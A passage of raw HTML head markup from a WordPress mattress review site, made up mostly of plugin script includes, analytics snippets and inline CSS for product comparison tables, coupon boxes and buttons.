0 !important; } </style> <!--[if !IE]><!--> <link rel='stylesheet' id='tablepress-responsive-tables-flip-css' href='https://www.sleepadvisor.org/wp-content/plugins/tablepress-responsive-tables/css/tablepress-responsive-flip.min.css?ver=1.5' type='text/css' media='all' /> <!--<![endif]--> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/jq-sticky-anything.min.js?ver=2.1.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-compear/includes/slick-1.5.7/slick/slick.js?ver=1.1.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-compear/includes/sorttable.js?ver=1.1.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-compear/includes/greensock-js/src/minified/TweenMax.min.js?ver=1.1.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-compear/includes/greensock-js/src/minified/jquery.gsap.min.js?ver=1.1.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-hide-post/public/js/wp-hide-post-public.js?ver=2.0.10'></script> <link rel='https://api.w.org/' href='https://www.sleepadvisor.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.sleepadvisor.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.sleepadvisor.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1" /> <link rel='shortlink' href='https://www.sleepadvisor.org/' /> <link rel="alternate" type="application/json+oembed" href="https://www.sleepadvisor.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.sleepadvisor.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.sleepadvisor.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.sleepadvisor.org%2F&#038;format=xml" /> <style type="text/css"> nav.top_menu > ul > li > a { padding: 5px 6px 5px 6px !important; }</style> <style type="text/css"> .title-with-orange-background h3, .title-with-orange-background h2 { color: white !important; padding: 5px 10px 5px 10px !important; }</style> <style type="text/css"> @media only screen and (max-width: 4000px) and (min-width: 1029px) { .custom-coupon-section{ width: 60%; margin: 0 auto; } } </style> <style type="text/css"> #cookie-notice { background-color: #7a8398ed !important; } .cn-button.wp-default{ color:#ffffff; background:#E98D2A; padding:5px 10px 5px 10px; font-size:14px; border:1px solid #E98D2A; border-radius:25px; display: block; width:100px; margin:0 auto !important; font-weight: 500; } @media screen and (max-width: 4000px) and (min-width: 1000px) { .cookie-notice-container { width: 60%; margin:0 auto; } }</style> <style type="text/css"> .disclosure { color: #999999; font-size: 12px; line-height: 14px; }</style> <style type="text/css"> nav.top_menu ul.sub-menu > li > a { color: #294863 !important; } nav.top_menu ul.sub-menu { background: #F3F3F3; } .fa-bed, .fa-dollar, .fa-star, .fa-balance-scale, .fa-book, .fa-square, .fa-ellipsis-v { color: #FF931E !important; } .sub-menu .column_grid h2 { font-size: 12px; line-height: 11px; } .sub-menu article.column_grid figure a.rh-cat-label-title { display: none; } .sub-menu article.column_grid figure { margin-bottom: 10px; } .sub-menu .wpb_single_image img { max-width: 100px; } .sub-menu .wpb_tour_next_prev_nav span { display: none; } .sub-menu img.lazyimages { transition: none; } nav.top_menu > ul > li > a { padding: 5px 7px 5px 7px; }</style> <style type="text/css"> .sidebar .widget_text a { text-decoration: none; } .sidebar .widget_text a { color: #e99f00; } .sidebar .widget_text a:hover { color: #ba8514; } .sidebar .widget p { font-size: 16px; } .widget.facebook_widget { margin-bottom: 0px; }</style> <style type="text/css"> .footer_widget .social_icon .fb, .footer_widget .social_icon .tw, .footer_widget .social_icon .gp, .footer_widget .social_icon .pn { background-color: #FFA41B; } .footer-bottom .footer_widget .widget_nav_menu ul li { font-size: 17px; } .footer-bottom .footer_widget a { text-decoration: none; }</style> <style type="text/css"> /*custom mini review button*/ .product-button-red:hover { background-color: #E4393E !important; } /*mattress review page table button*/ .sabutton { color:#ffffff; background:#E67D31; padding:5px 10px 5px 10px; font-size:14px; border:1px solid #E67D31; border-radius:25px; display: block; width: 100%; } .product-button-red { color: #ffffff; font-weight: 700; background-color: #E55253; background-image: -webkit-linear-gradient(top,rgba(255,255,255,.2) 0,rgba(255,255,255,.01) 100%); background-image: -o-linear-gradient(top,rgba(255,255,255,.2) 0,rgba(255,255,255,.01) 100%); background-image: linear-gradient(to bottom,rgba(255,255,255,.2) 0,rgba(255,255,255,.01) 100%); background-repeat: repeat-x; display: block; width:100%; font-family: Roboto,Arial; font-size: 16px; padding: 15px 20px; text-align: center; border-radius: 2em; } </style> <style type="text/css"> .post-meta-key {color: green; font-weight: bold; font-size: 110%; } .display-facet { margin: 30px 7px 7px 7px!important; background: #fafafa!important; padding: 21px!important; width: 30%; display: inline-block!important; vertical-align: top!important; } @media only screen and (max-width: 960px) { .display-facet { width: 47%; } } @media only screen and (max-width: 740px) { .display-facet { width: 100%; } } } .display-title { margin: 0 auto; display: flex; text-align: center; } .display-title h4 { margin: 5px auto; display: flex; text-align: center; color: #000; font-weight: bold; padding: 10px 0; } .dysplay-full-review { margin: 0 auto; display: flex; margin-top: 15px; } .visit-brand { background-color: #F3882B; color: #fff; padding: 5px 10px; border-radius: 20px; font-size: small; margin: 0 auto; float: left; text-align: center; } .noUi-connect{ background: #5A709A !important; }</style> <style type="text/css"> .tablepress.dataTable.no-footer.dtr-inline.collapsed{ width:100% !important; } h3{ font-size: 23px; line-height: 30px; } h2{ font-size: 27px; line-height: 33px; } .promo-description { color: #000; background: #FBDC60; padding: 0px 18px; text-transform: uppercase; font-weight: bold; font-size: 14px; width: 70%; margin: auto; margin-bottom: 6px; display:block; }</style> <style type="text/css"> .tablepress.tablepress-id-13.dataTable.no-footer.dtr-inline.collapsed, .tablepress.tablepress-id-14.dataTable.no-footer.dtr-inline.collapsed, .tablepress.tablepress-id-15.dataTable.no-footer.dtr-inline.collapsed{ width:100% !important; }</style> <script> window.onload = function(){ var bbdate = new Date("2019-6-19"); var d = bbdate.getDate(); var m = bbdate.getMonth(); var y = bbdate.getFullYear(); document.getElementById("month").innerHTML = m; document.getElementById("date").innerHTML = d; document.getElementById("year").innerHTML = y; }; </script> <head> <meta name="twitter:card" content="summary_large_image"> </head> <head><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> </head> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MPNCFP8');</script> <style type="text/css">div#toc_container {background: #f4f4f4;border: 1px solid #ffffff;width: 100%;}div#toc_container p.toc_title {color: #ffffff;}div#toc_container p.toc_title a,div#toc_container ul.toc_list a {color: #1B486E;}div#toc_container p.toc_title a:hover,div#toc_container ul.toc_list a:hover {color: #1B486E;}div#toc_container p.toc_title a:hover,div#toc_container ul.toc_list a:hover {color: #1B486E;}div#toc_container p.toc_title a:visited,div#toc_container ul.toc_list a:visited {color: #F8B116;}</style><style type="text/css" id="et-social-custom-css"> </style><style type="text/css"> .rate-line .filled,.rate_bar_wrap .review-top .overall-score,.rate-bar-bar,.top_rating_item .score.square_score,.radial-progress .circle .mask .fill{background-color:#f8b116;}.meter-wrapper .meter,.rate_bar_wrap_two_reviews .score_val{border-color:#f8b116;}header .main-nav,.main-nav.dark_style{background:none repeat scroll 0 0 #F3F3F3!important;box-shadow:none;}.main-nav{border-bottom:none;}.dl-menuwrapper .dl-menu{margin:0 !important}.header_top_wrap{background:none repeat scroll 0 0 ffffff!important;}.header-top,.header_top_wrap{border:none !important}.header_top_wrap .user-ava-intop:after,.header-top .top-nav a,.header-top a.cart-contents,.header_top_wrap .icon-search-onclick:before{color:#2c4e85 !important;}.header-top .top-nav li{border:none !important;}.main-nav .user-ava-intop:after,nav.top_menu ul li a,.dl-menuwrapper button i{color:#294863 !important;}nav.top_menu > ul > li > a:hover{box-shadow:none;}#main_header{background-color:#F3F3F3 !important}.header-top{border:none;}.footer-bottom{background-color:#1A3062 !important}.footer-bottom .footer_widget{border:none !important} .wpsm_promobox.rehub_promobox{border-left-color:#f8b217!important;}.top_rating_block .top_rating_item .rating_col a.read_full,.color_link{color:#f8b217 !important;}nav.top_menu > ul:not(.off-canvas) > li > a:hover,nav.top_menu > ul:not(.off-canvas) > li.current-menu-item a,.search-header-contents{border-top-color:#f8b217;}nav.top_menu > ul > li ul{border-bottom:2px solid #f8b217;}.wpb_content_element.wpsm-tabs.n_b_tab .wpb_tour_tabs_wrapper .wpb_tabs_nav .ui-state-active a{border-bottom:3px solid #f8b217 !important}.featured_slider:hover .score,.top_chart_controls .controls:hover,article.post .wpsm_toplist_heading:before{border-color:#f8b217;}.btn_more:hover,.small_post .overlay .btn_more:hover{border:1px solid #f8b217;color:#fff}.wpsm-tabs ul.ui-tabs-nav .ui-state-active a,.rehub_woo_review .rehub_woo_tabs_menu li.current{border-top:3px solid #f8b217;}.wps_promobox{border-left:3px solid #f8b217;}.gallery-pics .gp-overlay{box-shadow:0 0 0 4px #f8b217 inset;}.post .rehub_woo_tabs_menu li.current,.woocommerce div.product .woocommerce-tabs ul.tabs li.active{border-top:2px solid #f8b217;}.rething_item a.cat{border-bottom-color:#f8b217}nav.top_menu ul li ul{border-bottom:2px solid #f8b217;}.widget.deal_daywoo{border:3px solid #f8b217;padding:20px;background:#fff;}.deal_daywoo .wpsm-bar-bar{background-color:#f8b217 !important} #buddypress div.item-list-tabs ul li.selected a span,#buddypress div.item-list-tabs ul li.current a span,#buddypress div.item-list-tabs ul li a span,.user-profile-div .user-menu-tab > li.active > a,.user-profile-div .user-menu-tab > li.active > a:focus,.user-profile-div .user-menu-tab > li.active > a:hover,.slide .news_cat a,.news_in_thumb:hover .news_cat a,.news_out_thumb:hover .news_cat a,.col-feat-grid:hover .news_cat a,.alphabet-filter .return_to_letters span,.carousel-style-deal .re_carousel .controls,.re_carousel .controls:hover,.openedprevnext .postNavigation a,.postNavigation a:hover,.top_chart_pagination a.selected,.woocommerce .widget_price_filter .ui-slider .ui-slider-handle,.woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle,.flex-control-paging li a.flex-active,.flex-control-paging li a:hover,.widget_edd_cart_widget .edd-cart-number-of-items .edd-cart-quantity,.btn_more:hover,.news_out_tabs > ul > li:hover,.news_out_tabs > ul > li.current,.featured_slider:hover .score,#bbp_user_edit_submit,.bbp-topic-pagination a,.bbp-topic-pagination a,.widget.tabs > ul > li:hover,.custom-checkbox label.checked:after,.slider_post .caption,ul.postpagination li.active a,ul.postpagination li:hover a,ul.postpagination li a:focus,.top_theme h5 strong,.re_carousel .text:after,.widget.tabs .current,#topcontrol:hover,.main_slider .flex-overlay:hover a.read-more,.rehub_chimp #mc_embed_signup input#mc-embedded-subscribe,#rank_1.top_rating_item .rank_count,#toplistmenu > ul li:before,.rehub_chimp:before,.wpsm-members > strong:first-child,.r_catbox_btn,.wpcf7 .wpcf7-submit,.rh_woocartmenu-icon,.comm_meta_wrap .rh_user_s2_label,.wpsm_pretty_hover li:hover,.wpsm_pretty_hover li.current,.rehub-main-color-bg,.togglegreedybtn:after,.rh-bg-hover-color:hover .news_cat a,.rh_wrapper_video_playlist .rh_video_currently_playing,.rh_wrapper_video_playlist .rh_video_currently_playing.rh_click_video:hover,.rtmedia-list-item .rtmedia-album-media-count{background:#f8b217;}@media (max-width:767px){.postNavigation a{background:#f8b217;}} a,.carousel-style-deal .deal-item .priced_block .price_count ins,nav.top_menu ul li.menu-item-has-children ul li.menu-item-has-children > a:before,.top_chart_controls .controls:hover,.flexslider .fa-pulse,.footer-bottom .widget .f_menu li a:hover,.comment_form h3 a,.bbp-body li.bbp-forum-info > a:hover,.bbp-body li.bbp-topic-title > a:hover,#subscription-toggle a:before,#favorite-toggle a:before,.aff_offer_links .aff_name a,.rh-deal-price,.rehub_feat_block .start_price span,.news_lettr p a,.commentlist .comment-content small a,.related_articles .title_cat_related a,article em.emph,.campare_table table.one td strong.red,.sidebar .tabs-item .detail p a,.category_tab h5 a:hover,.footer-bottom .widget .title span,footer p a,.welcome-frase strong,.news_lettr:after,article.post .wpsm_toplist_heading:before,.post a.color_link,.categoriesbox:hover h3 a:after,.bbp-body li.bbp-forum-info > a,.bbp-body li.bbp-topic-title > a,.widget .title i,.woocommerce-MyAccount-navigation ul li.is-active a,.category-vendormenu li.current a,.deal_daywoo .title,.rehub-main-color,.wpsm_pretty_colored ul li.current a,.wpsm_pretty_colored ul li.current,.rh-heading-hover-color:hover h2 a,.rh-heading-hover-color:hover h3 a,.rh-heading-hover-color:hover h4 a,.rh-heading-hover-color:hover h5 a{color:#f8b217;} span.re_filtersort_btn:hover,span.active.re_filtersort_btn,.page-link > span:not(.page-link-title),.postimagetrend .title,.widget.widget_affegg_widget .title,.widget.top_offers .title,header .header_first_style .search form.search-form [type="submit"],header .header_eight_style .search form.search-form [type="submit"],.more_post a,.more_post span,.filter_home_pick span.active,.filter_home_pick span:hover,.filter_product_pick span.active,.filter_product_pick span:hover,.rh_tab_links a.active,.rh_tab_links a:hover,.wcv-navigation ul.menu li.active,.wcv-navigation ul.menu li:hover a,header .header_seven_style .search form.search-form [type="submit"],.title_deal_wrap,.rehub-sec-color-bg,#buddypress div.item-list-tabs#subnav ul li a:hover,#buddypress div.item-list-tabs#subnav ul li.current a,#buddypress div.item-list-tabs#subnav ul li.selected a{background:#f8b217 !important;color:#fff !important;}.widget.widget_affegg_widget .title:after,.widget.top_offers .title:after,.vc_tta-tabs.wpsm-tabs .vc_tta-tab.vc_active,.vc_tta-tabs.wpsm-tabs .vc_tta-panel.vc_active .vc_tta-panel-heading{border-top-color:#f8b217 !important;}.page-link > span:not(.page-link-title){border:1px solid #f8b217;}.page-link > span:not(.page-link-title),.header_first_style .search form.search-form [type="submit"] i{color:#fff !important;}.rh_tab_links a.active,.rh_tab_links a:hover,.rehub-sec-color-border{border-color:#f8b217}.rh_wrapper_video_playlist .rh_video_currently_playing,.rh_wrapper_video_playlist .rh_video_currently_playing.rh_click_video:hover{background-color:#f8b217;box-shadow:1200px 0 0 #f8b217 inset;}.rehub-sec-color{color:#f8b217} .woocommerce .summary .masked_coupon,.woocommerce a.woo_loop_btn,.woocommerce input.button.alt,.woocommerce .checkout-button.button,.woocommerce a.add_to_cart_button,.woocommerce-page a.add_to_cart_button,.woocommerce .single_add_to_cart_button,.woocommerce div.product form.cart .button,.priced_block .btn_offer_block,.priced_block .button,.rh-deal-compact-btn,input.mdf_button,#buddypress input[type="submit"],#buddypress input[type="button"],#buddypress input[type="reset"],#buddypress button.submit,.ap-pro-form-field-wrapper input[type="submit"],.btn_block_part .btn_offer_block,.wpsm-button.rehub_main_btn,.wcv-grid a.button,input.gmw-submit,#ws-plugin--s2member-profile-submit,#rtmedia_create_new_album{background:none #43c801 !important;color:#fff !important;border:none !important;text-decoration:none !important;outline:0;border-radius:0 !important;box-shadow:0 2px 2px #E7E7E7 !important;}.woocommerce a.woo_loop_btn:hover,.woocommerce input.button.alt:hover,.woocommerce .checkout-button.button:hover,.woocommerce a.add_to_cart_button:hover,.woocommerce-page a.add_to_cart_button:hover,.woocommerce a.single_add_to_cart_button:hover,.woocommerce-page a.single_add_to_cart_button:hover,.woocommerce div.product form.cart .button:hover,.woocommerce-page div.product form.cart .button:hover,.priced_block .btn_offer_block:hover,.wpsm-button.rehub_main_btn:hover,#buddypress input[type="submit"]:hover,#buddypress input[type="button"]:hover,#buddypress input[type="reset"]:hover,#buddypress button.submit:hover,.small_post .btn:hover,.ap-pro-form-field-wrapper input[type="submit"]:hover,.btn_block_part .btn_offer_block:hover,.wcv-grid a.button:hover,#ws-plugin--s2member-profile-submit:hover{background:none #43c801 !important;color:#fff !important;opacity:0.8;box-shadow:none !important;border-color:transparent;}.woocommerce a.woo_loop_btn:active,.woocommerce .button.alt:active,.woocommerce .checkout-button.button:active,.woocommerce a.add_to_cart_button:active,.woocommerce-page a.add_to_cart_button:active,.woocommerce a.single_add_to_cart_button:active,.woocommerce-page a.single_add_to_cart_button:active,.woocommerce div.product form.cart .button:active,.woocommerce-page div.product form.cart .button:active,.wpsm-button.rehub_main_btn:active,#buddypress input[type="submit"]:active,#buddypress input[type="button"]:active,#buddypress input[type="reset"]:active,#buddypress button.submit:active,.ap-pro-form-field-wrapper input[type="submit"]:active,.btn_block_part .btn_offer_block:active,.wcv-grid a.button:active,#ws-plugin--s2member-profile-submit:active{background:none #43c801 !important;box-shadow:none;top:2px;color:#fff !important;}.re_thing_btn .rehub_offer_coupon.masked_coupon:after{border:1px dashed #43c801;border-left:none;}.re_thing_btn.continue_thing_btn a,.re_thing_btn .rehub_offer_coupon.not_masked_coupon{color:#43c801 !important;}.re_thing_btn a,.re_thing_btn .rehub_offer_coupon{background-color:#43c801;border:1px solid #43c801;}.main_slider .re_thing_btn a,.widget_merchant_list .buttons_col{background-color:#43c801 !important;}.re_thing_btn .rehub_offer_coupon{border-style:dashed;}.deal_daywoo .price{color:#43c801}@media(min-width:1224px){.single-post .full_width > article.post,single-product .full_width > article.post{padding:32px}.title_single_area.full_width{margin:25px 32px 0 32px;}.main-side .title_single_area.full_width{margin:0;}.full_width .wpsm-comptable td img{padding:5px}}</style><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress." /> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.sleepadvisor.org/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><script> var clicky_site_ids = clicky_site_ids || []; clicky_site_ids.push(101045517); </script> <script async src="//static.getclicky.com/js"></script> <link rel="icon" href="https://www.sleepadvisor.org/wp-content/uploads/2017/02/favicon-sleep-advisor-150x150.png" sizes="32x32" /> <link rel="icon" href="https://www.sleepadvisor.org/wp-content/uploads/2017/02/favicon-sleep-advisor-300x300.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.sleepadvisor.org/wp-content/uploads/2017/02/favicon-sleep-advisor-300x300.png" /> <meta name="msapplication-TileImage" content="https://www.sleepadvisor.org/wp-content/uploads/2017/02/favicon-sleep-advisor-300x300.png" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ .item-tag { background: #61B900; display: block; color: #fff; padding: 1px 3px; border-radius:4px; text-transform: uppercase; font-size: 12px; font-weight: bold; letter-spacing: 0.5px; margin-top: 2px; text-align: center; width: 86%; } .vTable tbody td, .vTable thead th { vertical-align: middle; } .vTable thead th { background-color: black; color: white; } .vTable .column-1 { width: 10%; } .vTable .column-2 { width: 50%; } .vTable .column-3 { width: 20%; } .vTable .column-4 { width: 20%; } .safc-items { display: flex; flex-direction: column; font-family: 'Open Sans', sans-serif; background-color: #f9f9f9; border-radius: 10px; } .safc-items__titles { background-color: #222!important; text-transform: uppercase; color: #fff; text-align: center; padding: 7px 7px; align-items: center; font-weight: bold!important; font-size: 18px; } .safc-item { display: flex; flex-wrap: wrap; border: 2px solid #294863; border-radius: 10px; text-decoration: none; flex-wrap: wrap; padding: 15px; } a.safc-item:hover { text-decoration: none!important } a.safc-item:link { text-decoration: none!important; } .safc-item__features-list{ list-style-position: outside; font-weight: normal; } .safc-item__title-image, .safc-item__column-image { width: 23%; order: 2; } .safc-item__title-product, .safc-item__column-product { width: 100%; order: 1; flex-direction: column; margin: 0px 0px 0px 0px; padding: 0px 0px 0px 0px; } .safc-item__title-features, .safc-item__column-features { width: 76%; order: 3; padding-left: 0px; padding-right: 0px; margin: 0 0 0 5px; } .safc-item__column-button { width: 100%; order: 4; flex-direction: column; } .safc-item__column-image { display: flex; flex-direction: column; align-items: center; justify-content: center; margin: auto; } .safc-item__image { max-width: 90%; max-height: 90%; padding: 0px 0px 0px 0px; margin: 0px 0px 0px 0px; max-height: 140px; } .safc-item__column-features { align-items: center; color: black; } .safc-item__column-product { display: flex; justify-content: center; flex-direction: column; color: #222; font-weight: 600!important; font-size: 20px; } .safc-item__column-title { text-align: center; margin: 0px 0px 20px 0px; color: #FB931F!important; font-size: 28px; line-height: 32px; } .safc-item__link-label { color: #294863!important; line-height: 24px; font-weight: 600; text-align: left; text-decoration: none; margin: 0px 0px 5px 0px; border-radius: 0px; letter-spacing: .5px; font-weight: bold!important; font-size: 18px; justify-content: center;} .safc-item__link-label-mobile { color: #294863!important; font-weight: 600; text-align: left; text-transform: uppercase; text-decoration: none; letter-spacing: .5px; font-weight: bold!important; font-size: 16px; justify-content: center; display: none; } .safc-item__link-label:empty { display: none; } .safc-item__stars { color: #000; display: flex; font-size: 15px; padding: 4px 6px; text-transform: uppercase; text-align: center; margin:auto; margin-top: 0px; width: 100px; } .safc-item__features-item { color: #888787; font-size: 15px; line-height: 20px; margin-bottom: 0px!important; margin-left: 0px; } .safc-item__features-item-mobile { color: #294863; font-size: 15px; font-weight: 700; line-height: 21px; margin-bottom: 0px!important; margin-left: 0px; display: none; } .safc-item__features-item:empty { display: none; } .safc-item__features-item span { color: #222; position: relative; top: 0px; font-size: 15px; } .safc-item__features-item-sub { color: #222; font-size: 16px; line-height: 25px; margin-bottom: 0px!important; margin-left: 0px; } .safc-item__features-item-sub:empty { display: none; } .safc-item__features-item-sid { color: #222; font-size: 16px; font-weight: bold!important; line-height: 25px; margin-bottom: 0px!important; margin-left: 0px; } .safc-item__features-item-sid:empty { display: none; } .safc-item__column-button { display: flex; align-items: center; justify-content: center; } .safc-item__button { background-color: #FB931F; line-height: 20px; text-decoration: none; text-transform: uppercase; color: #fff!important; font-family: Helvetica!important; font-weight: bolder!important; font-size: 15px; letter-spacing: 0.2px; border-radius: 4px; padding: 10px 14px; width: 90%; max-width: 170px; margin: 15px 20px 5px 20px; text-align: center; transition: .2s linear; -webkit-box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); -moz-box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); } .safc-item__button:hover { background-color: #C75D28!important; } .safc-item__link { flex-basis: 100%;} .safc-items p{ display: none;} @media screen and (max-width: 700px) { .safc-item { flex-wrap: wrap; padding: 7px; } .safc-item__title-image, .safc-item__title-features { display: none; } .safc-item__title-product, .safc-item__column-image, .safc-item__column-product, .safc-item__column-features, .safc-item__column-button{ width: 100%; text-align: center; } .safc-item__column-product { order: 1; } .safc-item__column-title { margin-top: 2px; margin-bottom: 0px; text-align: center; font-size: 20px; line-height: 1.2; } .safc-item__column-image { justify-content: center; order: 2; width: 45%; margin: auto; max-width: 100%; margin: 10px 0 0 0; } .safc-item__column-features { order: 3; width: 50%; text-align: left; margin: 10px 0; display: flex; line-height: 0; } .safc-item__features-item-sub { display: none; } .safc-item__column-button { order: 4; } .safc-item__button { text-decoration: none; text-transform: uppercase; margin-bottom: 10px; margin-top: 5px; margin-right: 0px; margin-left: 0px; color: #222; font-family: Helvetica!important; font-weight: bolder!important; font-size: 13px; border-radius: 4px; padding: 8px 12px; width: 70%; max-width: 170px; text-align: center; transition: .2s linear; -webkit-box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); -moz-box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); box-shadow: 0px 2px 1px 0px rgba(0,0,0,0.3); } .safc-item__link { margin-bottom: 10px; margin-top: -10px; } .safc-item__link-label { text-align: left; font-size: 16px; margin: auto; margin: 0px 0 0 0; display: none; } .safc-items__titles span { display: none; } .safc-item__features-item{ display: none; } .safc-item__features-item-mobile { display: block; } .safc-item__link-label-mobile { display: contents; font-size: 19px; } } @media screen and (max-width: 450px) { .safc-item__column-image { width: 100%; } .safc-item__image { max-width: 150px; } .safc-item__column-features { width: 100%; text-align: center; } .safc-item__features-item-mobile span { font-size: 12px; } } /**** SA2 CSS CODE VERSUS TABLE ******/ .sa2-container { margin: 0 auto; font-family: 'arial'; } .sa2-list { display: flex; } .sa2-item { display: flex; flex-direction: column; border: 1px solid #E0E0E0; background: #FCFCFC; border-radius: 5px; padding: 20px; align-items: center; width: 50%; vertical-align: center; } .sa2-item+.sa2-item { margin-left: 10px; } .sa2-item__image-wrapper { max-width: 220px; height: 150px; } .sa2-item__image { width: 100%; mix-blend-mode: multiply; } .sa2-item__coupon { text-align: center; color: #444; font-size: 16px; margin-bottom: 15px; height: 80px; display: table; } .sa2-item__coupon-name:empty{ display: none; } .sa2-item__coupon_span0 { margin: 0; padding: 0px 10%; display: table-cell; vertical-align: middle; width:100%; } .sa2-item__coupon_span { margin: auto; display: block; display: table-cell; } .sa2-item__coupon_span :empty { display: none; } .sa2-item__coupon-name { text-transform: uppercase; color: #f60; font-size: 25px; font-weight: bold; display: table-row; } .sa2-item__button-wrapper { display: flex; width: 100%; } .sa2-item__button { text-decoration: none; color: #fff; border-radius: 30px; background: #F8B117; text-transform: uppercase; padding: 10px 10px; margin-bottom: 25px; transition: .2s linear; font-weight: bold; width: 80%; margin: auto; text-align: center; } .sa2-item__button:hover { color:#fff!important; background: #f60; } .sa2-item__list { list-style: none; width: 80%; padding-left: 0; margin: auto; margin-top:30px; } .sa2-item__list-item { position: relative; color: #444; font-size: 14px; line-height: 15px; padding-bottom: 10px; list-style: none!important; } .sa2-item__list-item::before { content:'\2713'; display:inline-block; color:#7FE509; padding:0 6px 0 0; position: absolute; width: 17px; height: 17px; top: 0; left: -20px; } @media screen and (max-width: 600px) { .sa2-list { flex-direction: column; } .sa2-item +.sa2-item { margin-left: 0; margin-top: 10px; } .sa2-item { width: 100%; } .sa2-item__coupon { height: 60px; } .sa2-item__image-wrapper { max-width: 220px; height: 120px; } } /* Featured Section */ .safs-items{display:flex;flex-direction:column;font-family:'Arial',sans-serif}.safs-item{display:flex;flex-wrap:wrap;border-left:10px solid #F8B117;border-radius:0;text-decoration:none;flex-wrap:wrap;padding:5px 20px;background-color:#F4F4F4;border-radius:15px}a.safs-item:hover{text-decoration:none!important}.safs-item__column-image{width:25%;order:1;margin:auto 0}.safs-item__column-features{width:100%;order:2;padding-left:0;padding-right:0;align-items:center;color:black;margin:10px 10px}.safs-item__column-button{width:100%;order:2}.safs-item__image{max-height:110px;max-width:90%;margin:0 auto;display:block;height:auto}.safs-item__description{font-size:15px!important;padding:0 0 5px 0;color:#222;line-height:18px}.safs-item__description b{font-size:18px;font-weight:700}.safs-item__title{font-size:27px!important;color:#F8B117!important;font-weight:600!important;margin:0 0 10px 0}.safs-item__column-button{display:flex;align-items:center;justify-content:center;padding-top:10px}.safs-item__button{background-color:#F8B117;text-decoration:none;text-transform:uppercase;color:#fff!important;font-family:Helvetica!important;font-weight:bolder!important;font-size:14px;letter-spacing:.2px;border-radius:4px;padding:5px 10px;width:80%;max-width:180px;text-align:center;transition:.2s linear;-webkit-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);-moz-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);box-shadow:0 2px 1px 0 rgba(0,0,0,.3);display:block;margin:10px auto 0}.safs-item__button:hover{background-color:#CC9112!important}.safs-items p{display:none}@media screen and (max-width:600px){.safs-item{flex-wrap:wrap;padding:15px}.safs-item__column-features,.safs-item__column-button,.safs-item__description,.aafs-item_column-image{width:100%;text-align:left}.safs-item__column-features{order:2;justify-content:center;width:100%;text-align:left;margin:0 0 0 0;text-align:left}.safs-item__column-image{order:1;width:10%;display:none}.safs-item__image{max-height:120px}.safs-item__column-button{order:3}.safs-item__description{font-size:15px!important}.safs-item__description b{font-size:15px!important}.safs-item__title{font-size:20px!important;font-weight:600!important}.safs-item__button{text-decoration:none;text-transform:uppercase;color:#222;font-family:Helvetica!important;font-weight:bolder!important;font-size:13px;border-radius:4px;padding:5px 12px;width:50%;max-width:180px;min-width:165px;text-align:center;transition:.2s linear;-webkit-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);-moz-box-shadow:0 2px 1px 0 rgba(0,0,0,.3);box-shadow:0 2px 1px 0 rgba(0,0,0,.3)}} .sacta-container{max-width:1200px;-webkit-box-shadow:0 2px 6px 2px rgba(0,0,0,.3);-moz-box-shadow:0 2px 6px 2px rgba(0,0,0,.3);box-shadow:0 2px 6px 2px rgba(0,0,0,.3);display:flex;flex-direction:row}.sacta-container__inner-left{width:40%;display:block;padding-right:10px;margin:auto}.sacta-container__inner-right{width:60%;display:flex;flex-direction:column;background:#f9f9f9;margin:auto;padding:15px 25px}img.sacta-item__image{max-width:-webkit-fill-available;width:95%;display:block;margin:auto;padding:15px 10px;max-height:155px}.sacta-item__discount{color:#FB931F;font-size:23px;font-family:'Open Sans';font-weight:900;text-align:center}.sacta-item__couponcode{color:#294863;font-size:18px;font-family:'Open Sans';font-weight:700;text-align:center;padding-top:10px;padding-bottom:15px}span.sacta-item__couponcode{color:#FB931F}.sacta-item__button{display:block;margin:auto;max-width:max-content;padding:8px 25px;background:#FB931F;text-align:center;color:#fff;font-family:'Open Sans';font-size:16px;font-weight:500;text-transform:uppercase;text-decoration:none!important;border-radius:8px;-webkit-box-shadow:3px 3px 6px 0 rgba(0,0,0,.3);-moz-box-shadow:3px 3px 6px 0 rgba(0,0,0,.3);box-shadow:3px 3px 6px 0 rgba(0,0,0,.3)}.sacta-item__button:hover{background:#f6b46b;color:#fff!important}@media screen and 